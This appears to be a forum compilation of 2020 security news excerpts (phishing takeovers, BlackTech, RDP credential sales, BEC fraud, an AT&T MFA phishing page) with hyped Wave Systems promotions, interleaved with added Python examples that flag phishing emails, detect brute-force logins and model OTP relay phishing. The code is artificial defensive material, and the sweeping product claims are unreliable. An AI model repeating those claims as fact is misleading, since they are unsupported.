The security incident highlights the need for multi-factor authentication in the enterprise.
A phishing attack taking place against an organization has revealed a crafty method to bounce between victims in a way deemed "ingenious" by a researcher.
On September 29, cybersecurity architect and bug bounty hunter Craig Hays outlined a recent phishing attempt which went far beyond the usual spray-and-pray tactics and basic attempts to compromise a network, to become "the greatest password theft he had ever seen."
In a Medium blog post, Hays detailed how a response team received an alert from their organization at 10 am, when a user fell prey to a phishing attack.
Originally, the security expert simply deemed the notification "another day, another attack." The team locked the impacted account down and began to investigate the incident in order to find the root cause and any potential damage.
Within minutes, several more alerts pinged their inbox. This, in itself, isn't unusual. As Hays noted, "emails that made it through the filtering rules tended to hit a number of people at the same time."
However, after the sixth report, the responders noticed this was potentially something more substantial -- and by the time they had conducted an initial damage assessment and two accounts had been recovered, they faced a "huge wave of account takeovers."
"We could see that all of the accounts were being accessed from strange locations all over the globe and sending out a large number of emails," Hays said. "For so many accounts to be hit at once, it was either a really, really effective phishing attack, or someone had been biding their time after stealing credentials over a long period."
Please see the rest of the article at the link above (recommended, to see how it works).
==================================================================
Even trained employees are going to have a difficult time with this phishing. It's very successful and sneaky. For this reason and other reasons, Wave VSC 2.0 and Wave ERAS should sell out in rapid fashion to stop this phishing.
==================================================================
wavesys.com
==================================================================
Wave solutions, better security, Wave solutions, better security!!
Business top brass are terrified their companies will simply be collateral damage in a future cyber-war
https://www.theregister.com/2020/09/30/cyber_war_fears/
=================================================================
wavesys.com
=================================================================
Wave solutions, better security!! Wave solutions, better security!!
China-Linked 'BlackTech' Hackers Start Targeting U.S.
https://www.securityweek.com/china-linked-blacktech-hackers-start-targeting-us
The China-linked BlackTech cyber-spies have adopted new malicious tools in recent attacks, and they have started targeting the United States, Symantec security researchers revealed on Tuesday.
Also referred to as Palmerworm, the hacking group is believed to have been active since at least 2013. The campaign analyzed by Symantec ran from August 2019 until as recently as August 2020, and it targeted organizations in construction, electronics, engineering, media, and finance in Japan, Taiwan, the U.S., and China. The threat actor was previously known to target East Asia.
The recent attacks revealed the use of dual-use tools and a new suite of custom malware, including backdoors such as Consock, Waship, Dalwit, and Nomri. Previously, the threat actor was observed employing the backdoors known as Kivars and Plead (which Symantec refers to as Palmerworm).
“We have not observed the group using these malware families in previous attacks – they may be newly developed tools, or the evolution of older Palmerworm tools,” the security firm notes in a new report.
Despite the use of undocumented malware, other artefacts observed in these attacks, including the use of previously employed infrastructure, suggest that the BlackTech threat actor is behind them.
In addition to the new backdoors, the hackers leveraged a custom loader and a network reconnaissance tool, along with dual-use tools, such as Putty, PSExec, SNScan, and WinRAR.
Furthermore, the threat actor signed the payloads in these attacks with stolen code-signing certificates, a tactic it was observed employing before. While Symantec hasn’t identified the initial attack vector, the actor is known for the use of spear-phishing to access victim networks.
A total of five victims were identified in these attacks, including organizations in media, electronics, and finance based in Taiwan, an engineering company in Japan, and a construction company in China. Some U.S.-based companies were targeted as well, but they haven’t been identified.
The targeting of Taiwanese companies isn’t something new for BlackTech, which previously infiltrated government agencies in the country. Taipei said at the time that the group is operating out of China.
Although the first activity associated with the recent campaign started in August 2019, the attackers were able to maintain presence in the compromised networks for a long time: activity associated with the attack was observed on compromised machines within the media company’s network in August 2020.
“Palmerworm also maintained a presence on the networks of a construction and a finance company for several months. However, it spent only a couple of days on the network of a Japanese engineering company in September 2019, and a couple of weeks on the network of an electronics company in March 2020,” Symantec explains.
The security researchers are unsure what type of data the attackers might have exfiltrated from the compromised organizations, but believe that cyber-espionage might have been the purpose of the attacks.
==================================================================
wavesys.com
==================================================================
Wave solutions, better security, Wave solutions, better security!!
Wave solutions, better security!!!!
Universal Health Services Ransomware Attack Impacts Hospitals Nationwide
https://threatpost.com/universal-health-ransomware-hospitals-nationwide/159604/
=================================================================
I shake my head when reading an article like this one. Wave has great solutions to stop ransomware, and many ransomware incidents keep popping up. Somehow organizations are missing out on Wave's solutions, and people could be or are dying because of ransomware!!! BE PREPARED WITH WAVE SOLUTIONS!!! BETTER SECURITY AT LESS THAN HALF THE COST!!!
=================================================================
wavesys.com
The price of stolen remote login passwords is dropping. That's a bad sign
https://www.zdnet.com/article/the-price-of-stolen-remote-login-passwords-is-dropping-thats-a-bad-sign/
The cost of RDP credentials is going down - and it's probably happening because poor cybersecurity is making log-in details easy to find.
Cyber criminals are lowering the prices they are charging for access to corporate networks via compromised remote desktop protocol (RDP) logins, a move which indicates how leaked usernames and passwords are becoming increasingly available to hackers as a means of gaining access to corporate networks – and demonstrates how poor passwords continue to plague enterprise security.
Remote desktop protocol (RDP) enables employees to securely connect to the servers of their organisation remotely - a practice which has grown during 2020 as employees have increasingly worked from home. RDP is also regularly used by administrator accounts, enabling IT and security teams to perform updates and provide assistance to users.
However, while extremely useful, an improperly secured RDP account or server can provide cyber criminals with easy access to a corporate network with either stolen or easily cracked passwords.
Cybersecurity researchers at Armor analysed 15 different dark web markets and underground cyber criminal forums and found that the average price for RDP credentials has dropped to between $16 and $25, compared with an average of over $20 during 2019. Some dark web vendors are advertising these credentials as "non-hacked", claiming that they haven't been used before.
In many cases, the reason why stolen RDP login credentials have become available in the first place is because they're poorly secured with commonly used and weak passwords, as well as simple-to-guess user names such as 'administrator'.
Often an automated brute force attack will uncover these usernames and passwords, providing the access required to the network – or giving an underground vendor the opportunity to quickly make money by selling the credentials on.
Attackers buying the credentials could use the login details for anything from performing reconnaissance on the network, to using them as a gateway for stealing additional usernames and passwords, confidential information or intellectual property. They could also use the RDP credentials as the first stage of a major malware or ransomware attack against the organization.
And the way in which the cost of RDP credentials is going down suggests that the problem is getting worse, implying that prices are declining as the underground market gets saturated with more and more remote login details.
"Any time access used to compromise an organization gets cheaper - in this case RDP credentials - this increases the threat for businesses because there is a lower price to entry for the fraudsters," Chris Stouff, CSO of Armor told ZDNet.
It's potentially the case that more login credentials have become available because of the rise in remote working during this year.
However, it's possible for organisations to boost the security of corporate RDP services by following two simple steps. First of all, default credentials should never be used to secure accounts and instead organisations should encourage users to set up a strong password for their account.
Secondly, organisations should apply multi-factor authentication when possible as it provides a substantial barrier to cyber criminals being able to take advantage of accounts – even if the username and password have been leaked.
=================================================================
wavesys.com
Be prepared with Wave!!! Using better security at less than half the cost - Wave VSC 2.0 (MFA) would prevent the problems in the above article.
Why the $26 billion in BEC scams are worse than you think
https://www.scmagazine.com/perspectives/why-26-billion-in-bec-scams-are-worse-than-you-think/
Business email compromise (BEC) scams are one of the biggest money makers for cyber criminals. BEC attacks are also unique in that they rely on human behavior rather than sophisticated technology. Typical BEC scams use an authentic-looking email from a top executive to deceive subordinates into transferring money.
A lot of money.
The FBI reports that BEC scams cost enterprises more than $26 billion worldwide between 2016 and 2019. These scams accounted for half of all cybercrime losses in 2019. In June, reports disclosed that a U.K. affiliate of Caterpillar lost $11 million to BEC fraud. Last summer, the European subsidiary of Toyota Boshoku Corporation, a car components manufacturer member of the Toyota Group, lost more than $37 million dollars to a BEC attack. Calling it a global phenomenon, INTERPOL launched a public service campaign to warn and educate the public about BEC fraud.
How does BEC fraud differ from other attacks? Rather than launch a mass attack against hundreds or thousands of unknown targets, BEC scams focus on a single target. The attackers patiently research companies to pinpoint the right executive. They analyze the company’s website and other public information to identify senior personnel, determine the chain of command, track important customers, even study the email style of the executive they target, sometimes researching for as long as a month or more.
When ready to start their attack, fraudsters use social engineering scams to break into the network. They steal the executive’s credentials, then email a subordinate asking for immediate transfer of funds. It’s always for a credible reason — a last-minute acquisition or a late payment to a partner or supplier. Because of the urgency, the fraudster asks the employee to wire the funds to a different account than usual and keep their actions confidential. Thanks to the hacker’s due diligence, the email looks authentic and the employee wires money—right to the bank account of the scammer.
In a variant called CEO Fraud, the attacker spoofs the executive’s email without needing to actually compromise the account to request a wire transfer. BEC scams also increasingly impersonate clients, employees and vendors to divert payments or payroll funds. The Russian gang Cosmic Lynx conducted more than 200 BEC campaigns over the past year, mostly under the pretense of a law firm working with Fortune 1000 companies on mergers and acquisitions.
How can security teams protect against BEC fraud? These scams cleverly play on two glaring human vulnerabilities: an employee’s susceptibility to social engineering, and their unquestioning trust in the chain of command.
Studies show that as many as 30 percent of employees are susceptible to social engineering, especially phishing campaigns. Unfortunately, it takes only one unsuspecting employee to help set the stage for a lucrative BEC attack. Phishing scams keep increasing in sophistication – they impersonate well-known brands such as Netflix, Google, and Amazon, as well as leverage hosted servers and public cloud tools.
Companies that conduct ongoing and varied security training of their employees – starting at onboarding and continuing with regularly scheduled simulated phishing attacks, stand the greatest chance of keeping invaders out of their network. The most effective security awareness programs use a wide range of simulated campaigns, from vanilla email hyperlinks to elaborate attacks disguised as messages from real brands or customers. Interactive, relevant, and ongoing training can reduce the percentage of successful phishing attempts from 30 percent to less than 5 percent.
Help your employees to detect phishing emails with these three questions:
Is the sender really who they claim to be? Start by checking the domain name – it’s easy to miss a one-letter mismatch between the sender’s domain and the company domain. Common tricks include swapping the “i” for an “l,” adding an “s” to the end of a known domain, or adding “int” or “inc.” Emails that arrive in a business inbox from gmail-type addresses, especially if you know the name of the sender, are a big giveaway.
Does the email contain suspicious content? Red flags include improper use of grammar or language, multiple spelling mistakes, or a different layout. Hover over any email links to see if they are unusual. If so, don’t click on them!
What are they asking me to do? Always be suspicious anytime an email asks you to do something atypical or unexpected, such as provide confidential log-in credentials or PII. Take a closer look at the sender’s address or content and you’ll usually catch the attack.
Unfortunately, many phishing schemes are successful, and the executive’s email credentials end up in the hands of the attacker. Ultimately, BEC scams succeed because they exploit subordinates who follow the chain of command. To defend against BEC fraud, companies should implement specific business and financial policies for all payments. Communicate these policies in writing to all company employees and insist on strict adherence. Here are a few best practices. Consider this a checklist to follow:
Payment authorizations. Specify which specific employees can make payments or transfer funds. Keep the number of authorized employees to a minimum.
Payment amounts. Require multiple sign-offs above a certain amount and specify who’s required to provide the additional authorization. Policies range from any amount above the reasonable and customary for that vendor/situation to a pre-determined threshold that automatically triggers the additional sign-off. Make the confirmation by phone to a pre-specified phone number instead of email.
Third-party validation. Recent BEC fraud attacks have impersonated third-party vendors, including suppliers and lawyers. Obtain the contact name and phone number in advance for all vendors the company does business with to verify any suspicious requests for payments.
Resist urgent requests or new payment methods. Train every employee authorized to make payments for the company on how to prevent BEC fraud. Help them understand how and why they are potential targets. Remind them they need to follow the company’s official payment policies without exception. Suspect any urgent and/or secretive request to make payments to a new bank account or payment address. Take precautions even if the amount seems low, as scammers often test the waters and take a measured approach to their attack.
Most importantly, empower employees to “break the chain of command” instead of breaking the rules. BEC scammers are counting on the authority of the CEO or other top executive to convince subordinates to do what they ask. Don’t let them get away with it.
Criminals turn to BEC fraud because the profits are large and the barriers to entry are low. Protect the company by empowering its most valuable assets – the employees. Train employees how to identify phishing campaigns, and give them simple tools like a phishing incident button to report suspicious messages. Develop clear guidelines for all financial transactions and payments. Address both of these areas, and the company will keep its hard-earned dollars in the company’s bank account, not those of the cyber attacker.
Colin Bastable, CEO, Lucy Security
=================================================================
Here is a $26 Billion with a B!!! problem that could have been thwarted with Wave ERAS and Wave VSC 2.0!!! These two solutions make it possible to stop these BEC scams going forward!!!
==================================================================
wavesys.com
Wave ERAS -
Key Features: Protect against phishing, malware and other network security threats by storing authentication credentials in hardware.
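The three questions in the BEC article above (is the sender who they claim to be, is the content suspicious, what are they asking me to do) can be turned into a mail-triage check. The following is an added example and is not code from the article, from Lucy Security or from Wave; the company domain examplecorp.com, the executive roster and the three sample messages are constructed for the example, and the keyword list is an assumption about what "atypical" requests look like.

```python
"""Check a suspected phishing / BEC message with the article's three questions.

Added example, not code from the article, Lucy Security or Wave. It encodes
the lookalike-domain tricks the article names (a one-letter mismatch, an "i"
swapped for an "l", a trailing "s", "int" or "inc" appended), the freemail
giveaway, hovering over links, and unusual requests. The company domain,
executive names and sample messages are constructed for the example.
"""
import re
from email.utils import parseaddr
from typing import Dict, List, Optional

COMPANY_DOMAIN = "examplecorp.com"                       # assumption: the defender's own domain
FREEMAIL = {"gmail.com", "yahoo.com", "outlook.com", "hotmail.com"}
EXECUTIVES = {"jane doe", "john smith"}                  # constructed roster of senior staff
URGENCY = re.compile(
    r"\b(urgent|immediately|asap|wire|transfer|payment|confidential|keep this between us)\b", re.I)


def registrable(host: str) -> str:
    """Drop subdomains so mail.examplecorp.com compares as examplecorp.com."""
    parts = host.lower().strip(".").split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host.lower()


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance; a one-letter mismatch scores 1."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_reason(domain: str, company: str = COMPANY_DOMAIN) -> Optional[str]:
    """Explain why `domain` imitates `company`, or None if it is unrelated or identical."""
    d, c = registrable(domain), registrable(company)
    if d == c or "." not in d or "." not in c:
        return None
    d_label, d_tld = d.rsplit(".", 1)
    c_label, c_tld = c.rsplit(".", 1)
    if d_label in {c_label + s for s in ("s", "int", "inc", "-inc")}:
        return "suffix added to company domain: " + d
    if edit_distance(d_label, c_label) == 1:
        if len(d_label) == len(c_label):
            a, b = next((x, y) for x, y in zip(c_label, d_label) if x != y)
            if {a, b} <= {"i", "l", "1"}:
                return "i/l swap in company domain: " + d
        return "one-letter mismatch with company domain: " + d
    if d_label == c_label and d_tld != c_tld:
        return "same name under a different TLD: " + d
    return None


def analyse(message: Dict) -> List[str]:
    """Return the red flags raised for one message; an empty list means none."""
    flags = []
    name, addr = parseaddr(message.get("from", ""))
    domain = addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""
    # 1. Is the sender really who they claim to be?
    reason = lookalike_reason(domain)
    if reason:
        flags.append("sender: " + reason)
    if registrable(domain) in FREEMAIL and name.strip().lower() in EXECUTIVES:
        flags.append("sender: executive name %r from freemail %s" % (name, domain))
    # 2. Suspicious content: where do the links really go?
    for url in message.get("links", []):
        host = re.sub(r"^[a-z]+://", "", url, flags=re.I).split("/")[0].split("@")[-1]
        if registrable(host) != registrable(COMPANY_DOMAIN):
            flags.append("link to external host: " + host)
    # 3. What are they asking me to do?
    text = message.get("subject", "") + "\n" + message.get("body", "")
    hits = sorted({m.lower() for m in URGENCY.findall(text)})
    if hits:
        flags.append("request: urgency/payment language: " + ", ".join(hits))
    return flags


# Constructed sample messages (not real mail).
SAMPLES = {
    "lookalike": {
        "from": "Jane Doe <jane.doe@examplecorps.com>",
        "subject": "Urgent wire transfer",
        "body": "Please transfer $48,000 to the account in the link immediately and keep this confidential.",
        "links": ["https://examplecorps.com/invoice"],
    },
    "freemail": {
        "from": "John Smith <johnsmith.ceo@gmail.com>",
        "subject": "quick favour",
        "body": "Are you at your desk? I need you to handle a payment today, will explain later.",
        "links": [],
    },
    "legit": {
        "from": "Jane Doe <jane.doe@examplecorp.com>",
        "subject": "Q3 planning",
        "body": "Agenda attached for Thursday.",
        "links": ["https://intranet.examplecorp.com/agenda"],
    },
}

if __name__ == "__main__":
    for label, msg in SAMPLES.items():
        print(label, "->", analyse(msg) or "no red flags")
```

The sender check is deliberately narrow (suffixes, a single-character edit, i/l/1 swaps, a different TLD) so that an unrelated partner domain is not flagged as a lookalike; the freemail rule only fires when the display name matches someone on the roster, which is the "you know the name of the sender" case the article describes. A hit on the third question alone is not proof of fraud, which is why the function returns reasons rather than a verdict: the payment-policy checklist in the article (call-back to a pre-agreed number, multiple sign-offs) is still the control that stops the wire.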
Gaming Industry Hit With 10B+ Attacks In Past Two Years
https://www.darkreading.com/edge/theedge/gaming-industry-hit-with-10b+-attacks-in-past-two-years/b/d-id/1339002
Criminals scored big with credential stuffing and web app attacks, yet many gamers seem unfazed.
Akamai's latest "State of the Internet/Security" report holds worrisome news for the gaming industry: Between June 2018 and June 2020, gamers and gaming companies were the victims of 10 billion cyberattacks.
Akamai, which recorded over 100 billion credential stuffing attacks for the period, said nearly 10 billion of those targeted games. Further, attackers also went after web applications, with 152 million attacks directed at the gaming industry (out of 10.6 billion such attacks recorded overall).
According to the annual report, published today, web app attacks mostly took the form of SQL injections, as well as Local File Inclusion (LFI) attacks. The reason mobile games and web-based games are "big SQLi and LFI targets," the report says, is because successful criminals can gain access to "usernames and passwords, account information, and anything game related that is stored on the server."
Games are also ripe for distributed denial-of-service (DDoS) attacks: More than 3,000 of the 5,600 unique DDoS attacks Akamai observed between July 2019 and June 2020 were aimed at gaming, making it "by far the most-targeted sector."
Unsurprisingly, the pandemic did not help matters.
"A notable spike in credential stuffing activity occurred as isolation protocols were instituted around the world," Akamai says in the report. "Much of the traffic was the result of criminals testing credentials from old data breaches in attempts to compromise new accounts created using existing username and password combinations."
Another point of concern is that gamers aren't concerned enough: Akamai's data, compiled in coordination with DreamHack, shows that while 55% of "frequent players" admitted to having had an account compromised, only 20% of them expressed being "worried" or "very worried" about it. A little over half (54%) of hacked players said they see security as a shared responsibility between players and game companies/creators.
Akamai stressed in last year's "State of the Internet" report that gaming was fast becoming a lucrative criminal target.
"Now, with 24 months of data, we can positively state that gamers are a prime target, and so are their online existences," it says in its 2020 report.
Read the "State of the Internet/Security" report here.
=================================================================
This post is in addition to post #246119. Stronger authentication with hardware security could be done with the help of Wave and Wavexpress experiences!!!
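The RDP article above describes automated brute force against weak accounts such as 'administrator', and the Akamai gaming report describes credential stuffing, where one source replays breached username/password pairs against many different accounts. Both leave a distinct shape in an authentication log, and the following added example (not code from ZDNet, Armor, Akamai or Wave) detects each shape over a constructed log. The log format, the addresses and the account names are made up for the example; in practice the same logic would run over Windows Security events 4625/4624 (RDP is logon type 10) or a web application's login audit trail.

```python
"""Two detections over a constructed authentication log.

Added example, not code from the articles or from Wave. It models the two
patterns the articles describe: automated brute force against a single
RDP/administrator account, and credential stuffing, where one source tries
many different accounts with breached username/password pairs.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed log: "<ISO time> <source ip> <user> <SUCCESS|FAILURE>".
LOG = """\
2020-10-05T09:00:01 203.0.113.7 administrator FAILURE
2020-10-05T09:00:03 203.0.113.7 administrator FAILURE
2020-10-05T09:00:05 203.0.113.7 administrator FAILURE
2020-10-05T09:00:07 203.0.113.7 administrator FAILURE
2020-10-05T09:00:09 203.0.113.7 administrator FAILURE
2020-10-05T09:00:11 203.0.113.7 administrator SUCCESS
2020-10-05T09:01:00 198.51.100.23 alice FAILURE
2020-10-05T09:01:01 198.51.100.23 bob FAILURE
2020-10-05T09:01:02 198.51.100.23 carol FAILURE
2020-10-05T09:01:03 198.51.100.23 dave FAILURE
2020-10-05T09:01:04 198.51.100.23 erin SUCCESS
2020-10-05T09:01:05 198.51.100.23 frank FAILURE
2020-10-05T09:02:30 192.0.2.10 alice FAILURE
2020-10-05T09:02:45 192.0.2.10 alice SUCCESS
"""


def parse(log: str):
    """Return (timestamp, source, user, succeeded) tuples sorted by time."""
    events = []
    for line in log.splitlines():
        if not line.strip():
            continue
        ts, src, user, result = line.split()
        events.append((datetime.fromisoformat(ts), src, user.lower(), result == "SUCCESS"))
    return sorted(events)


def brute_force(events, threshold=5, window=timedelta(seconds=60)):
    """(source, account) pairs with at least `threshold` failures inside one `window`.

    A per-pair deque keeps only the failures that fall inside the sliding window,
    so a slow trickle of typos over a day does not trigger, a burst does.
    """
    recent = defaultdict(deque)
    hits = set()
    for ts, src, user, ok in events:
        if ok:
            continue
        q = recent[(src, user)]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()
        if len(q) >= threshold:
            hits.add((src, user))
    return sorted(hits)


def credential_stuffing(events, min_accounts=5, max_success_rate=0.3):
    """Sources that try many distinct accounts and mostly fail.

    Stuffing differs from brute force: one attempt per account, many accounts,
    a low hit rate because only a few breached pairs were reused here.
    """
    per_src = defaultdict(lambda: {"users": set(), "attempts": 0, "ok": 0})
    for _, src, user, ok in events:
        s = per_src[src]
        s["users"].add(user)
        s["attempts"] += 1
        s["ok"] += int(ok)
    return sorted(
        src for src, s in per_src.items()
        if len(s["users"]) >= min_accounts and s["ok"] / s["attempts"] <= max_success_rate
    )


def followed_by_success(events, flagged):
    """Flagged brute-force pairs whose failures end in a successful logon: treat as compromised."""
    flagged = set(flagged)
    return sorted({(src, user) for _, src, user, ok in events if ok and (src, user) in flagged})


if __name__ == "__main__":
    ev = parse(LOG)
    bf = brute_force(ev)
    print("brute force:", bf)
    print("compromised after brute force:", followed_by_success(ev, bf))
    print("credential stuffing sources:", credential_stuffing(ev))
```

The thresholds are assumptions to tune per environment: an RDP gateway that legitimately sees a few failed logons per user per hour wants a higher `threshold` and a shorter `window`, while a consumer login endpoint usually needs `min_accounts` raised well above five to avoid flagging NAT gateways that many real users share. Either way, the source that succeeds after a run of failures is the one to investigate first, which is what `followed_by_success` isolates.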
Phishing Page Targets AT&T’s Employee Multi-Factor Authentication
https://securityboulevard.com/2020/09/phishing-page-targets-atts-employee-multi-factor-authentication/
Employees at companies of all sizes can be targets of phishing attacks, but certain corporations or industries can be more valuable to an attacker than others.
For instance, employees at telecom companies will often have some level of elevated access that is unavailable to a non-employee. In fact, this access can be so valuable that attackers can find it easier and more efficient to simply bribe employees with large amounts of money, as revealed in a case last year.
It’s no surprise that we recently found a phishing page set up to replicate the AT&T Global employee login page and steal employees’ credentials and one-time passwords.
=================================================================
AT&T Global Logon Phishing Page --- Please see the picture that shows a place to enter SecurID passcode. One employee who makes the wrong choice could expose the company to a data breach or cyber attack.
There are many reasons that organizations should be using Wave VSC 2.0 over SecurID and this article is one of those reasons. Using the TPM, second factor of authentication and an international standard, over a One Time Password is better security!!!
==================================================================
https://www.wavesys.com/
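The phishing page in the AT&T article works because a one-time passcode is just a string: whatever the victim types into the fake page can be forwarded to the real login within the code's validity window. A second factor whose response is bound to the origin the browser actually loaded does not relay the same way. The following is an added toy model of that difference; it is not Wave's product, not RSA SecurID and not any TPM or authenticator API. The device-bound key is modelled with an HMAC secret that never leaves the "device" (assumption: a real token would use an asymmetric key inside the TPM or authenticator), and the origins, secrets and fixed clock are constructed.

```python
"""Why a relayed one-time passcode works for the phisher and an origin-bound
second factor does not.

Added example and a toy model, not Wave's product, RSA SecurID or any TPM API.
The phishing proxy replays whatever the victim submits to the real site.
A device-bound key is modelled with an HMAC secret that never leaves the
"device" (assumption: a real token would hold an asymmetric key in hardware).
The origins, seeds and the fixed demo clock are constructed.
"""
import hashlib
import hmac
import secrets
import struct

REAL_ORIGIN = "https://login.example-telco.com"      # constructed
PHISH_ORIGIN = "https://login.example-te1co.com"     # constructed lookalike
DEMO_TIME = 1_601_900_000.0                          # fixed clock so the demo is repeatable

# --- one-time passcode (TOTP-style, RFC 6238 shape) ----------------------------
OTP_SEED = b"constructed-shared-seed"


def otp(t: float, seed: bytes = OTP_SEED, step: int = 30) -> str:
    """6-digit code: HMAC-SHA1 over the time counter, dynamically truncated."""
    counter = int(t // step)
    mac = hmac.new(seed, struct.pack(">Q", counter), hashlib.sha1).digest()
    off = mac[-1] & 0x0F
    code = (struct.unpack(">I", mac[off:off + 4])[0] & 0x7FFFFFFF) % 1_000_000
    return "%06d" % code


def server_accepts_otp(code: str, t: float) -> bool:
    """The real server only checks that the digits match the current step."""
    return hmac.compare_digest(code, otp(t))


# --- origin-bound second factor -----------------------------------------------
DEVICE_KEY = b"constructed-device-bound-key"         # never leaves the user's device


def device_sign(challenge: bytes, origin: str, key: bytes = DEVICE_KEY) -> str:
    """The device signs the server's challenge together with the origin the browser reports."""
    return hmac.new(key, origin.encode() + b"|" + challenge, hashlib.sha256).hexdigest()


def server_accepts_assertion(challenge: bytes, assertion: str, key: bytes = DEVICE_KEY) -> bool:
    """The real server verifies against *its own* origin, not the one the phisher used."""
    return hmac.compare_digest(assertion, device_sign(challenge, REAL_ORIGIN, key))


# --- the attack: an adversary-in-the-middle relaying the victim's input --------
def phish_otp(t: float = DEMO_TIME) -> bool:
    """Victim types the OTP into the phishing page; the proxy forwards it at once."""
    stolen_code = otp(t)                        # what the victim typed on the fake page
    return server_accepts_otp(stolen_code, t)   # relayed inside the 30 s step: accepted


def phish_origin_bound() -> bool:
    """The proxy relays the real server's challenge, but the victim's device binds
    its signature to the origin the browser actually loaded: the phishing domain."""
    challenge = secrets.token_bytes(32)                    # from the real server, relayed
    assertion = device_sign(challenge, PHISH_ORIGIN)       # victim's device, on the fake page
    return server_accepts_assertion(challenge, assertion)  # real server: origin mismatch


def legit_origin_bound() -> bool:
    """Same device, same key, but the browser is on the real origin."""
    challenge = secrets.token_bytes(32)
    return server_accepts_assertion(challenge, device_sign(challenge, REAL_ORIGIN))


if __name__ == "__main__":
    print("relayed OTP accepted by real server:", phish_otp())          # True
    print("relayed origin-bound assertion accepted:", phish_origin_bound())  # False
    print("genuine origin-bound login accepted:", legit_origin_bound())      # True
```

The point of the model is that the secret never has to leak for the OTP attack to work; the code is meant to be typed, so it can be typed into the wrong page. With the origin folded into the signed data, the phisher holds a valid signature for the wrong origin and nothing else, and stealing the key itself would require extracting it from the hardware that holds it.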